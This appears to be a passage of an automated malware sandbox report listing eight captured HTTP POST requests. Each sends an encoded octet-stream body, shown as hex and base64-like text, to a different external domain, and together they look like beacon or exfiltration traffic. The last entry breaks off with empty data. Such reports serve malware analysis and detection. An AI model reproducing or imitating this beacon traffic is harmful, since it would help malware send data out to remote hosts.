                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 77 35 48 33 64 73 35 78 6d 2f 32 64 70 6d 38 58 57 63 37 4a 4b 54 46 51 35 50 62 4f 56 33 62 46 34 67 34 54 6e 42 78 52 66 51 73 72 58 73 33 4c 39 79 56 66 64 55 5a 62 36 4a 30 4b 4c 2f 62 66 57 35 77 36 49 49 4d 76 45 5a 6b 38 2f 4e 4a 66 67 34 74 69 34 51 54 52 54 6e 32 4e 6c 68 6b 44 4d 4d 67 4a 76 46 71 54 4e 63 51 65 73 65 30 69 72 64 78 39 57 31 58 50 47 4e 71 44 32 56 39 4d 6c 54 4e 30 63 51 6a 63 62 33 6f 43 66 50 36 4c 75 5a 6c 32 54 36 58 62 63 63 76 2f 45 38 39 34 65 4a 36 6c 64 49 36 71 39 77 44 56 52 52 53 55 52 2b 75 50 70 45 74 32 76 37 31 43 70 35 73 6d 70 55 42 74 44 46 66 77 43 65 53 76 72 6e 51 57 5a 64 71 69 78 5a 6b 67 52 5a 34 78 39 57 54 63 41 35 39 4f 42 32 36 65 44 68 66 44 30 65 69 66 69 6a 2b 42 30 56 48 79 6a 2b 43 78 72 6b 7a 5a 6f 4e 6a 52 48 33 32 59 50 37 4e 6f 73 6e 2f 79 78 37 6e 4f 4a 6e 76 2f 52 39 59 70 70 38 7a 47 34 32 78 4c 67 4c 42 53 64 4a 41 66 31 71 6a 68 2f 4e 43 48 79 2b 50 39 34 57 64 66 43 49 77 52 63 33 38 7a 6e 4b 62 4f 43 6d 79 6c 41 66 4f 4e 58 44 41 42 6a 51 4a 75 42 79 2f 52 72 77 36 4d 44 52 71 66 48 34 53 67 43 75 6c 63 44 59 2f 61 63 4b 34 44 73 52 42 45 47 4f 76 6f 75 30 44 72 75 38 4b 70 74 37 49 69 32 6e 61 50 56 50 75 6e 32 38 34 45 6e 44 51 50 2f 37 44 44 32 74 70 4a 58 50 74 47 4a 4f 6d 72 75 6c 32 4c 4d 79 2b 56 69 6b 38 64 31 55 47 59 71 74 6e 6d 70 6d 61 66 51 42 35 47 72 52 48 6a 67 76 71 4d 46 55 53 30 37 67 47 74 34 79 45 69 2b 33 53 63 65 38 6e 4f 56 5a 49 6a 39 43 4a 48 57 4d 30 6b 65 36 52 62 63 6e 47 76 6b 77 69 6b 34 75 56 5a 63 34 52 4e 4d 35 53 62 4c 2b 6e 35 47 48 59 6a 51 6a 47 36 49 45 69 69 36 33 47 5a 30 30 51 49 72 75 77 38 45 66 41 79 57 4b 38 76 54 51 63 47 36 6d 41 77 Data Ascii: w5H3ds5xm/2dpm8XWc7JKTFQ5PbOV3bF4g4TnBxRfQsrXs3L9yVfdUZb6J0KL/bfW5w6IIMvEZk8/NJfg4ti4QTRTn2NlhkDMMgJvFqTNcQese0irdx9W1XPGNqD2V9MlTN0cQjcb3oCfP6LuZl2T6Xbccv/E894eJ6ldI6q9wDVRRSUR+uPpEt2v71Cp5smpUBtDFfwCeSvrnQWZdqixZkgRZ4x9WTcA59OB26eDhfD0eifij+B0VHyj+CxrkzZoNjRH32YP7Nosn/yx7nOJnv/R9Ypp8zG42xLgLBSdJAf1qjh/NCHy+P94WdfCIwRc38znKbOCmylAfONXDABjQJuBy/Rrw6MDRqfH4SgCulcDY/acK4DsRBEGOvou0Dru8Kpt7Ii2naPVPun284EnDQP/7DD2tpJXPtGJOmrul2LMy+Vik8d1UGYqtnmpmafQB5GrRHjgvqMFUS07gGt4yEi+3Sce8nOVZIj9CJHWM0ke6RbcnGvkwik4uVZc4RNM5SbL+n5GHYjQjG6IEii63GZ00QIruw8EfAyWK8vTQcG6mAw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 4a 49 2f 4e 36 74 49 30 6e 2f 32 65 72 45 4b 2f 68 55 34 53 74 64 56 39 56 56 67 69 67 57 68 46 4a 68 67 52 56 45 38 6f 6e 46 35 74 77 53 75 2b 75 34 73 46 47 56 58 7a 68 2f 35 6f 78 46 47 4f 6f 55 4e 4a 43 65 38 76 34 56 78 50 42 73 4c 79 30 70 5a 50 66 48 4c 52 64 6a 50 69 79 37 2f 51 41 6b 34 55 4c 75 41 6b 39 7a 43 64 33 4a 53 67 34 6a 32 67 4c 56 58 69 78 4f 2b 64 49 41 7a 38 7a 34 76 59 4a 32 6c 41 64 37 6d 35 64 64 79 73 70 56 42 65 2b 5a 56 66 38 6d 4e 43 77 58 66 78 61 77 46 39 77 77 72 52 4c 62 4d 55 56 2b 56 35 6a 31 43 2b 53 52 54 79 63 50 67 41 79 6b 71 58 50 63 36 43 74 65 44 2b 49 31 6b 69 66 58 6a 48 50 30 44 61 4f 4b 36 7a 58 71 5a 6c 35 4f 71 6d 33 76 43 58 75 58 32 63 64 51 58 71 78 74 66 4c 65 38 2b 66 56 6f 36 49 6a 78 62 53 36 4c 31 4a 6d 53 78 45 4d 63 44 4b 48 69 73 30 59 31 47 59 4d 2f 32 74 6b 4b 48 6a 78 6f 52 4e 34 6f 6a 45 70 36 71 46 73 63 41 69 5a 7a 61 79 66 6e 4b 45 52 78 35 44 37 32 51 78 6e 57 4a 65 63 47 70 51 6e 54 69 5a 6c 32 55 68 7a 58 58 65 6e 58 2b 34 32 4c 44 4d 65 38 63 49 71 6f 38 71 49 56 47 37 67 4f 32 77 62 44 49 46 32 45 55 55 38 2f 38 64 75 39 2b 71 68 66 38 72 70 66 58 7a 5a 55 72 38 77 4e 78 76 4a 30 61 47 77 62 4b 5a 35 43 6f 37 69 5a 72 76 4f 66 4b 4a 38 35 67 52 4f 53 44 76 4e 5a 6d 6b 35 6e 7a 2f 4f 38 37 7a 44 33 6d 4e 56 57 6a 38 4c 6d 6b 73 57 64 69 4f 53 59 6f 58 44 5a 75 7a 38 32 6a 74 70 41 61 77 38 39 77 71 33 43 54 42 4c 61 65 6e 53 31 6c 7a 44 59 72 52 44 48 7a 70 64 41 2b 42 63 33 51 6c 48 51 47 34 58 65 74 49 31 48 42 57 4e 74 2f 59 4e 42 4d 2f 63 34 2f 56 57 64 31 6a 31 32 6a 4c 69 76 63 38 36 70 55 4f 77 55 33 47 61 70 77 3d Data Ascii: JI/N6tI0n/2erEK/hU4StdV9VVgigWhFJhgRVE8onF5twSu+u4sFGVXzh/5oxFGOoUNJCe8v4VxPBsLy0pZPfHLRdjPiy7/QAk4ULuAk9zCd3JSg4j2gLVXixO+dIAz8z4vYJ2lAd7m5ddyspVBe+ZVf8mNCwXfxawF9wwrRLbMUV+V5j1C+SRTycPgAykqXPc6CteD+I1kifXjHP0DaOK6zXqZl5Oqm3vCXuX2cdQXqxtfLe8+fVo6IjxbS6L1JmSxEMcDKHis0Y1GYM/2tkKHjxoRN4ojEp6qFscAiZzayfnKERx5D72QxnWJecGpQnTiZl2UhzXXenX+42LDMe8cIqo8qIVG7gO2wbDIF2EUU8/8du9+qhf8rpfXzZUr8wNxvJ0aGwbKZ5Co7iZrvOfKJ85gROSDvNZmk5nz/O87zD3mNVWj8LmksWdiOSYoXDZuz82jtpAaw89wq3CTBLaenS1lzDYrRDHzpdA+Bc3QlHQG4XetI1HBWNt/YNBM/c4/VWd1j12jLivc86pUOwU3Gapw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 6d 6d 38 35 43 62 45 78 6f 50 30 51 68 62 75 55 30 50 2b 6d 79 77 71 52 70 41 33 76 70 48 50 63 64 59 73 31 6c 53 4e 76 43 63 4c 37 43 68 33 52 33 69 52 6a 4b 47 2f 33 7a 38 52 70 70 46 77 6a 6c 73 52 63 6a 57 45 45 4a 4c 48 7a 73 66 70 46 2f 71 57 49 30 42 35 30 7a 46 70 4d 37 64 33 2b 77 49 57 49 48 71 2b 44 46 4c 71 66 54 6c 48 67 65 31 41 31 6d 75 52 42 46 74 41 77 76 2b 66 61 77 78 61 45 47 38 79 59 64 39 58 50 62 36 57 56 47 39 6b 6c 4a 73 4a 54 33 42 37 61 31 65 36 4c 6b 55 62 49 77 56 55 76 2b 67 31 55 58 32 71 56 67 41 48 4f 72 45 33 70 64 35 55 41 38 41 4a 41 41 77 44 42 78 32 57 4c 62 69 74 67 57 75 4f 2f 35 63 76 70 58 51 77 65 35 70 79 71 32 35 45 30 4c 70 30 6f 73 6a 7a 62 33 55 64 46 64 53 76 78 77 44 65 51 34 58 31 67 58 70 76 6b 79 38 44 57 75 46 57 35 38 45 75 64 67 53 4a 6c 67 34 2b 63 43 70 35 71 76 6e 53 72 68 35 4e 6b 72 65 61 4a 44 63 74 45 51 74 58 6d 71 73 41 53 50 47 43 6d 65 59 44 4c 33 69 63 4f 4e 50 43 56 78 38 4d 74 57 68 31 72 78 38 4b 4f 74 77 78 30 59 31 6d 35 2b 55 7a 42 2f 76 76 7a 41 65 47 74 79 6f 41 78 30 72 5a 6c 69 69 4c 48 6f 71 6a 32 6f 6b 31 44 48 4a 55 71 74 4b 58 76 72 54 34 6c 51 67 6c 30 37 38 66 37 58 36 5a 4e 2b 48 32 42 61 42 53 38 77 31 48 6e 58 63 48 4d 33 48 6c 65 41 39 6a 73 6d 62 34 45 38 30 61 6d 5a 56 2b 76 73 39 70 4c 45 51 43 6a 34 4d 38 4f 79 77 56 7a 2b 53 54 41 50 58 6e 71 58 73 75 33 76 53 55 6f 34 2b 54 73 43 54 74 49 35 4e 50 79 43 65 78 77 6f 76 79 67 38 32 4e 30 46 4c 72 45 54 4c 41 50 7a 63 41 79 62 65 64 64 76 73 35 2b 41 4f 62 33 54 34 73 52 56 4b 41 38 39 42 66 53 36 37 4c 47 46 30 66 33 79 39 63 58 55 7a 52 32 73 65 36 69 41 6e 51 30 4f 6c 6e 70 59 77 58 6f 34 73 59 58 74 7a 51 6c 58 73 37 34 43 75 6f 6f 72 32 39 6b 55 6e 69 55 68 68 38 55 4a 72 49 4a 77 4e 77 68 Data Ascii: mm85CbExoP0QhbuU0P+mywqRpA3vpHPcdYs1lSNvCcL7Ch3R3iRjKG/3z8RppFwjlsRcjWEEJLHzsfpF/qWI0B50zFpM7d3+wIWIHq+DFLqfTlHge1A1muRBFtAwv+fawxaEG8yYd9XPb6WVG9klJsJT3B7a1e6LkUbIwVUv+g1UX2qVgAHOrE3pd5UA8AJAAwDBx2WLbitgWuO/5cvpXQwe5pyq25E0Lp0osjzb3UdFdSvxwDeQ4X1gXpvky8DWuFW58EudgSJlg4+cCp5qvnSrh5NkreaJDctEQtXmqsASPGCmeYDL3icONPCVx8MtWh1rx8KOtwx0Y1m5+UzB/vvzAeGtyoAx0rZliiLHoqj2ok1DHJUqtKXvrT4lQgl078f7X6ZN+H2BaBS8w1HnXcHM3HleA9jsmb4E80amZV+vs9pLEQCj4M8OywVz+STAPXnqXsu3vSUo4+TsCTtI5NPyCexwovyg82N0FLrETLAPzcAybeddvs5+AOb3T4sRVKA89BfS67LGF0f3y9cXUzR2se6iAnQ0OlnpYwXo4sYXtzQlXs74Cuoor29kUniUhh8UJrIJwNwh
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 75 6d 6d 67 30 74 68 72 6e 76 33 49 78 39 41 57 32 33 32 4b 78 4d 76 34 35 71 4b 67 51 39 41 48 6a 50 51 63 31 68 6f 50 73 49 71 74 47 4b 77 76 42 55 38 69 46 79 2f 44 56 69 79 2f 32 4a 4f 33 54 54 76 58 44 7a 53 73 36 54 72 35 6b 55 32 31 6b 2b 68 37 6b 34 34 5a 37 30 75 6b 42 4f 37 44 7a 2f 61 4f 6f 50 35 73 77 76 65 31 78 70 58 4e 62 6a 76 6a 4c 32 74 57 6e 62 76 55 39 69 58 36 30 41 48 57 65 41 38 31 52 35 34 4c 51 4f 59 38 65 35 77 4f 47 71 50 66 6b 72 55 64 50 38 57 4f 6b 52 2f 76 5a 43 4a 66 75 66 54 7a 6f 75 34 55 2b 79 64 4e 65 57 4d 50 43 6f 58 59 64 79 4d 2b 2f 52 39 4d 52 33 6f 31 49 48 53 7a 70 45 79 68 52 6b 62 79 67 38 5a 2b 6f 78 52 68 32 71 45 33 50 54 78 78 6b 55 52 61 56 37 46 65 35 6a 79 68 49 42 43 58 43 48 50 77 77 2b 55 73 75 73 66 43 4e 38 38 41 69 6e 66 42 33 56 38 34 54 78 77 6f 2b 6b 52 41 66 74 51 41 33 43 36 4f 53 39 59 44 61 2f 70 41 31 30 4b 2b 2b 77 4b 35 44 39 65 54 70 34 6d 37 72 39 33 69 4c 75 6a 43 4c 44 66 62 39 66 61 35 5a 56 6b 59 51 54 66 62 49 30 38 69 6f 39 70 72 53 68 66 6e 79 4b 70 35 2b 63 43 33 33 72 46 65 2b 4c 51 79 2b 35 6f 44 42 50 49 57 45 4c 58 4b 6f 77 70 44 53 37 39 33 30 6c 76 2f 2b 45 33 4a 6f 45 32 30 4e 32 54 30 43 76 73 66 73 63 6c 53 49 6d 30 5a 33 36 42 52 43 54 38 69 50 4f 35 57 35 61 37 31 6b 4c 59 30 31 47 59 64 6a 52 78 77 4a 45 55 41 77 54 35 4b 6b 4c 6d 42 30 2f 46 74 37 36 5a 4b 41 46 36 49 63 6e 36 4a 73 6b 70 64 42 46 76 56 2f 72 59 53 54 39 72 32 45 65 63 6f 2f 6d 50 7a 56 39 76 54 4d 79 48 78 6a 71 42 37 6c 36 49 61 79 57 34 43 69 6d 62 59 77 74 6e 6f 56 36 35 42 74 41 33 4b 6f 34 36 35 41 68 70 4b 68 50 41 45 53 6b 37 7a 44 37 30 42 66 44 79 78 6b 52 51 7a 38 35 63 48 52 6a 50 6b 7a 36 43 48 51 2b 79 76 45 5a 77 6e 75 30 38 3d Data Ascii: ummg0thrnv3Ix9AW232KxMv45qKgQ9AHjPQc1hoPsIqtGKwvBU8iFy/DViy/2JO3TTvXDzSs6Tr5kU21k+h7k44Z70ukBO7Dz/aOoP5swve1xpXNbjvjL2tWnbvU9iX60AHWeA81R54LQOY8e5wOGqPfkrUdP8WOkR/vZCJfufTzou4U+ydNeWMPCoXYdyM+/R9MR3o1IHSzpEyhRkbyg8Z+oxRh2qE3PTxxkURaV7Fe5jyhIBCXCHPww+UsusfCN88AinfB3V84Txwo+kRAftQA3C6OS9YDa/pA10K++wK5D9eTp4m7r93iLujCLDfb9fa5ZVkYQTfbI08io9prShfnyKp5+cC33rFe+LQy+5oDBPIWELXKowpDS7930lv/+E3JoE20N2T0CvsfsclSIm0Z36BRCT8iPO5W5a71kLY01GYdjRxwJEUAwT5KkLmB0/Ft76ZKAF6Icn6JskpdBFvV/rYST9r2Eeco/mPzV9vTMyHxjqB7l6IayW4CimbYwtnoV65BtA3Ko465AhpKhPAESk7zD70BfDyxkRQz85cHRjPkz6CHQ+yvEZwnu08=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 64 52 4d 46 55 75 43 4f 6f 76 30 6b 4b 44 45 52 4d 33 52 39 31 68 50 35 2b 49 4e 49 74 39 36 6f 46 4d 54 59 61 6f 6c 50 76 63 51 69 4c 4c 6b 44 48 4f 36 67 7a 4c 42 77 38 45 34 4b 73 57 57 32 69 55 6b 34 6f 42 6e 36 6d 39 54 52 65 70 46 53 42 6f 62 76 57 6e 6d 41 61 42 75 42 53 61 41 6d 4d 4d 5a 46 54 37 37 70 65 78 6c 54 4a 46 4e 68 52 34 5a 44 37 77 4b 62 30 48 4b 6f 6a 4d 6f 34 47 39 46 79 57 6d 66 38 44 36 35 68 59 4a 44 53 69 37 43 54 41 35 4a 63 48 39 30 6c 78 4d 46 54 72 2f 73 4b 2b 68 2f 64 58 74 6c 6b 34 67 6a 47 78 4e 55 69 49 34 49 4d 72 6f 6f 2f 70 77 32 75 74 75 2f 75 55 77 69 50 4d 6f 48 70 6f 72 51 7a 61 75 6b 6c 55 47 6e 6b 6d 4b 39 4b 71 76 37 73 30 6b 68 5a 37 75 6f 4f 74 32 2b 57 34 31 6f 4a 4f 74 6c 51 61 4a 65 56 45 6f 32 38 35 62 78 46 48 77 5a 36 74 6c 56 69 6b 64 53 52 44 37 41 66 4a 75 77 41 73 58 2b 52 33 4a 4a 46 4d 65 48 32 7a 74 64 41 41 48 35 36 59 58 7a 4a 32 55 43 4a 59 30 6a 4b 45 56 44 79 37 42 72 6e 71 6d 30 48 2b 2f 69 2b 4d 39 6a 65 4c 72 53 2f 4c 31 76 6e 59 2f 66 59 70 50 52 35 59 63 48 52 6b 66 64 33 6a 64 74 72 42 56 6e 74 6d 6b 72 64 2b 53 64 38 34 39 64 32 32 71 4b 75 54 4d 74 65 70 47 49 2b 51 48 33 79 4d 35 41 41 49 35 45 56 4a 50 56 36 63 4c 53 41 69 72 37 38 6a 67 4c 64 58 62 2b 59 4e 46 59 36 65 64 4c 35 66 53 2f 58 75 51 4b 30 65 56 64 33 6e 48 70 46 31 41 77 4c 6b 54 71 37 74 67 62 77 76 45 4d 59 77 75 38 63 68 52 48 71 5a 35 37 6d 50 44 36 30 4f 4b 2f 43 62 71 47 6b 45 2f 66 56 52 36 45 30 78 68 52 4d 55 58 31 6b 6e 2b 51 6b 42 50 66 58 39 38 6d 38 71 31 6a 37 44 73 6c 43 57 77 66 63 45 45 4e 79 62 4a 59 4b 68 47 6b 4d 79 63 75 57 4f 6e 43 36 46 35 75 55 76 73 52 2f 33 50 6a 63 59 76 36 33 31 6e 41 69 6e 2f 52 76 38 75 70 4c 6c 41 33 30 Data Ascii: dRMFUuCOov0kKDERM3R91hP5+INIt96oFMTYaolPvcQiLLkDHO6gzLBw8E4KsWW2iUk4oBn6m9TRepFSBobvWnmAaBuBSaAmMMZFT77pexlTJFNhR4ZD7wKb0HKojMo4G9FyWmf8D65hYJDSi7CTA5JcH90lxMFTr/sK+h/dXtlk4gjGxNUiI4IMroo/pw2utu/uUwiPMoHporQzauklUGnkmK9Kqv7s0khZ7uoOt2+W41oJOtlQaJeVEo285bxFHwZ6tlVikdSRD7AfJuwAsX+R3JJFMeH2ztdAAH56YXzJ2UCJY0jKEVDy7Brnqm0H+/i+M9jeLrS/L1vnY/fYpPR5YcHRkfd3jdtrBVntmkrd+Sd849d22qKuTMtepGI+QH3yM5AAI5EVJPV6cLSAir78jgLdXb+YNFY6edL5fS/XuQK0eVd3nHpF1AwLkTq7tgbwvEMYwu8chRHqZ57mPD60OK/CbqGkE/fVR6E0xhRMUX1kn+QkBPfX98m8q1j7DslCWwfcEENybJYKhGkMycuWOnC6F5uUvsR/3PjcYv631nAin/Rv8upLlA30
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 5a 6c 69 75 4a 6b 6f 58 75 76 33 5a 44 47 4e 52 72 5a 35 6a 69 67 30 6a 75 47 58 36 41 42 2f 2b 48 75 35 65 36 4a 6d 51 2b 68 45 48 4a 76 61 73 78 4b 78 71 36 73 79 66 62 43 35 48 33 6a 46 63 5a 54 63 79 77 49 6e 31 61 75 71 71 4b 63 59 58 63 57 36 77 34 67 4b 7a 51 50 2f 67 77 34 32 35 64 47 6c 6b 47 48 4a 76 53 6d 4c 64 4a 42 73 35 43 4c 5a 34 7a 39 4b 6b 35 53 48 68 47 67 4e 72 4b 59 37 38 31 74 4c 55 30 78 51 52 2f 39 6b 41 36 4c 31 4b 76 42 41 63 39 42 6f 6f 31 67 6d 35 44 50 6e 7a 35 35 72 6a 73 79 35 49 57 39 79 6c 30 38 73 6c 4a 76 79 35 71 71 38 56 65 59 39 4f 71 4f 2f 4a 56 4e 68 43 56 76 4d 76 72 72 4a 39 57 39 77 53 47 71 36 69 61 59 47 46 54 58 71 6d 57 6e 6e 45 70 72 61 75 4b 53 56 54 6b 45 6d 39 4d 52 46 53 6d 39 6b 47 73 37 68 6a 76 48 63 44 57 4e 68 56 61 4d 64 4c 74 68 63 4c 39 6f 79 6d 4e 37 6f 59 78 4d 50 69 77 79 53 71 59 6a 76 4c 6d 32 6e 41 4e 4d 58 47 79 5a 7a 46 45 6e 6b 53 4b 64 6a 39 48 2b 55 41 31 34 64 38 34 59 72 56 5a 37 68 46 6a 44 41 61 31 67 2f 35 4b 4e 35 37 6d 73 34 70 36 73 62 4d 4f 35 73 47 66 4b 66 2b 76 61 37 52 6f 66 4b 58 7a 47 53 70 71 5a 67 56 55 36 35 4f 72 4a 58 46 34 71 79 31 46 54 55 76 47 4b 45 77 6b 49 31 4d 61 6d 38 69 31 76 6e 57 51 65 41 50 6d 68 46 64 54 59 70 4c 31 48 57 39 32 55 6e 30 46 71 54 37 61 66 6f 70 6c 49 53 61 4c 42 67 56 75 33 38 6c 51 38 61 67 74 4b 70 75 72 6a 6a 63 51 41 45 61 59 46 61 4b 75 6e 76 78 4a 31 47 72 30 44 54 53 59 67 51 71 75 45 69 55 49 75 56 47 38 48 62 51 7a 35 4f 56 74 62 33 59 4f 66 34 59 52 38 42 2f 63 6a 75 30 71 6b 59 4a 6c 58 73 74 4b 53 52 73 33 59 37 49 31 55 7a 37 45 78 59 70 6f 47 35 45 47 47 65 30 4f 71 55 3d Data Ascii: ZliuJkoXuv3ZDGNRrZ5jig0juGX6AB/+Hu5e6JmQ+hEHJvasxKxq6syfbC5H3jFcZTcywIn1auqqKcYXcW6w4gKzQP/gw425dGlkGHJvSmLdJBs5CLZ4z9Kk5SHhGgNrKY781tLU0xQR/9kA6L1KvBAc9Boo1gm5DPnz55rjsy5IW9yl08slJvy5qq8VeY9OqO/JVNhCVvMvrrJ9W9wSGq6iaYGFTXqmWnnEprauKSVTkEm9MRFSm9kGs7hjvHcDWNhVaMdLthcL9oymN7oYxMPiwySqYjvLm2nANMXGyZzFEnkSKdj9H+UA14d84YrVZ7hFjDAa1g/5KN57ms4p6sbMO5sGfKf+va7RofKXzGSpqZgVU65OrJXF4qy1FTUvGKEwkI1Mam8i1vnWQeAPmhFdTYpL1HW92Un0FqT7afoplISaLBgVu38lQ8agtKpurjjcQAEaYFaKunvxJ1Gr0DTSYgQquEiUIuVG8HbQz5OVtb3YOf4YR8B/cju0qkYJlXstKSRs3Y7I1Uz7ExYpoG5EGGe0OqU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 76 67 77 6e 56 46 71 52 75 2f 32 42 54 54 62 54 66 54 43 70 44 4a 31 33 44 78 4a 4b 66 46 44 4d 4c 6e 6e 6f 66 37 61 47 4b 5a 4f 76 51 68 59 79 61 33 6d 6c 61 75 47 4f 43 44 38 61 6b 44 67 62 69 46 54 49 75 59 42 45 31 52 37 77 36 75 43 5a 31 30 63 58 6f 6b 51 54 77 7a 33 39 56 65 67 70 35 55 68 6a 61 4b 6f 4a 62 4d 58 4d 50 66 6e 71 47 48 71 59 50 6b 74 4b 4e 67 39 76 31 34 5a 70 6b 49 52 43 35 59 66 4f 43 71 75 71 6d 4e 65 7a 79 75 6c 2f 31 30 35 37 2f 63 66 31 48 35 36 4e 4c 32 61 57 32 38 52 71 51 4f 2b 45 6b 4d 55 51 56 42 6e 70 45 4e 54 58 2f 39 4d 7a 71 61 4a 61 67 45 4e 51 37 48 65 36 79 54 33 53 6a 64 76 78 75 68 59 4b 74 52 54 4a 6f 46 50 34 57 6f 69 6a 5a 6a 6d 7a 2b 36 4c 4f 65 42 50 47 38 6e 66 4e 4e 4b 32 62 64 70 68 67 38 58 49 72 5a 33 68 74 64 38 63 54 44 65 6a 6b 52 45 46 69 72 48 37 33 6a 47 4f 35 31 48 57 43 57 42 4b 6b 4f 79 61 33 55 58 39 4d 77 7a 55 35 64 49 4e 31 53 38 43 49 70 49 68 31 4d 33 47 5a 65 36 47 77 52 64 44 34 4c 4a 69 64 34 45 42 2f 34 39 76 65 47 34 30 59 63 6f 7a 65 52 55 4d 35 47 76 37 30 79 34 73 33 36 58 56 58 74 7a 69 75 41 59 4e 74 2b 41 33 55 62 62 47 6e 74 78 37 78 49 54 6f 57 64 71 63 6a 45 2b 39 56 50 5a 45 51 67 48 71 47 65 65 61 75 47 72 63 6a 35 66 56 2b 37 61 43 4a 52 51 6c 68 68 6a 45 36 61 6b 75 56 59 4b 59 7a 46 47 69 64 45 4e 70 52 68 6f 53 78 34 66 45 41 76 6c 36 51 2b 79 50 39 4d 47 57 79 34 39 51 79 53 45 48 6c 73 2b 78 59 72 75 44 54 59 58 4f 6e 48 54 49 34 43 79 62 54 2f 4e 34 39 44 6e 34 6b 54 55 49 65 55 42 61 44 2f 2b 59 48 76 69 4e 4b 52 62 38 31 51 6d 4c 55 6e 4a 6d 6f 43 68 32 46 6a 61 38 4f 50 4a 71 4b 6c 61 6a 42 41 4c 2f 59 6c 66 44 6d 4b 6a 6d 75 Data Ascii: vgwnVFqRu/2BTTbTfTCpDJ13DxJKfFDMLnnof7aGKZOvQhYya3mlauGOCD8akDgbiFTIuYBE1R7w6uCZ10cXokQTwz39Vegp5UhjaKoJbMXMPfnqGHqYPktKNg9v14ZpkIRC5YfOCquqmNezyul/1057/cf1H56NL2aW28RqQO+EkMUQVBnpENTX/9MzqaJagENQ7He6yT3SjdvxuhYKtRTJoFP4WoijZjmz+6LOeBPG8nfNNK2bdphg8XIrZ3htd8cTDejkREFirH73jGO51HWCWBKkOya3UX9MwzU5dIN1S8CIpIh1M3GZe6GwRdD4LJid4EB/49veG40YcozeRUM5Gv70y4s36XVXtziuAYNt+A3UbbGntx7xIToWdqcjE+9VPZEQgHqGeeauGrcj5fV+7aCJRQlhhjE6akuVYKYzFGidENpRhoSx4fEAvl6Q+yP9MGWy49QySEHls+xYruDTYXOnHTI4CybT/N49Dn4kTUIeUBaD/+YHviNKRb81QmLUnJmoCh2Fja8OPJqKlajBAL/YlfDmKjmu
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 6a 42 4d 4a 6d 66 7a 4e 76 66 32 59 35 66 67 56 70 39 48 41 33 49 2b 32 77 37 4b 55 32 69 33 73 38 4d 5a 31 34 42 67 77 49 57 33 58 7a 49 33 65 6c 31 38 55 77 59 51 65 54 56 55 6a 63 65 72 69 35 55 46 69 54 70 42 71 6f 70 76 4f 4b 63 34 35 4e 76 74 33 4d 38 4d 6f 43 43 55 46 7a 2b 30 4d 71 44 67 69 76 4f 74 41 78 2f 6e 39 43 6b 76 49 70 53 76 4c 30 63 4d 7a 48 6b 70 2b 59 36 43 51 4e 52 45 39 54 41 50 7a 76 52 46 4b 53 33 5a 69 78 69 31 6a 71 37 45 4e 78 30 42 5a 6a 5a 34 2f 41 39 5a 32 52 55 55 6a 64 48 39 4d 70 61 73 51 46 74 62 47 6b 31 77 61 47 4b 47 38 73 77 57 6d 50 4b 61 76 78 62 39 34 58 6e 2b 63 65 44 79 5a 56 39 4d 52 6e 6e 58 4c 31 63 31 66 37 38 37 77 59 39 5a 67 63 68 79 65 57 4e 2f 68 6a 49 79 6d 46 6c 46 4c 63 4e 33 31 6e 76 35 57 39 43 58 49 39 4d 53 38 58 51 37 45 38 35 2f 43 6b 35 4e 73 33 42 61 54 75 47 75 32 4f 72 6f 56 36 4d 6a 63 42 45 77 47 41 6b 65 4f 4d 4e 50 44 72 46 45 4b 6d 39 4c 78 79 69 61 78 4b 68 42 68 47 57 32 36 6b 57 49 4d 52 6b 59 69 59 4b 46 53 4a 47 4b 42 33 71 7a 68 61 51 42 2b 4c 31 4d 36 71 44 73 35 49 52 30 6b 44 34 4a 4a 68 59 32 63 34 55 2f 48 41 34 71 54 4a 71 59 79 46 72 4d 53 6e 63 7a 79 6c 36 7a 61 4b 70 4d 35 41 7a 35 50 6e 58 6c 61 5a 35 53 30 54 4b 54 33 30 4c 39 32 4b 75 41 2b 62 63 39 53 72 45 64 38 6a 6e 6f 63 6c 46 68 6c 66 66 64 70 61 54 53 44 4a 35 41 45 75 6f 63 61 65 6b 4b 44 47 56 68 6e 55 58 35 51 56 59 4a 50 78 50 37 37 62 62 4d 6c 62 55 33 38 66 49 69 63 68 5a 70 57 66 76 46 41 33 6a 48 4e 74 5a 59 4c 59 79 6d 69 7a 61 33 75 36 66 57 46 44 39 46 71 6e 55 55 47 6e 61 63 42 4e 35 77 45 4f 77 73 6b 4e 5a 48 4f 51 6f 41 69 75 36 74 45 34 6f 46 68 4b 33 6d 45 37 38 45 3d Data Ascii: 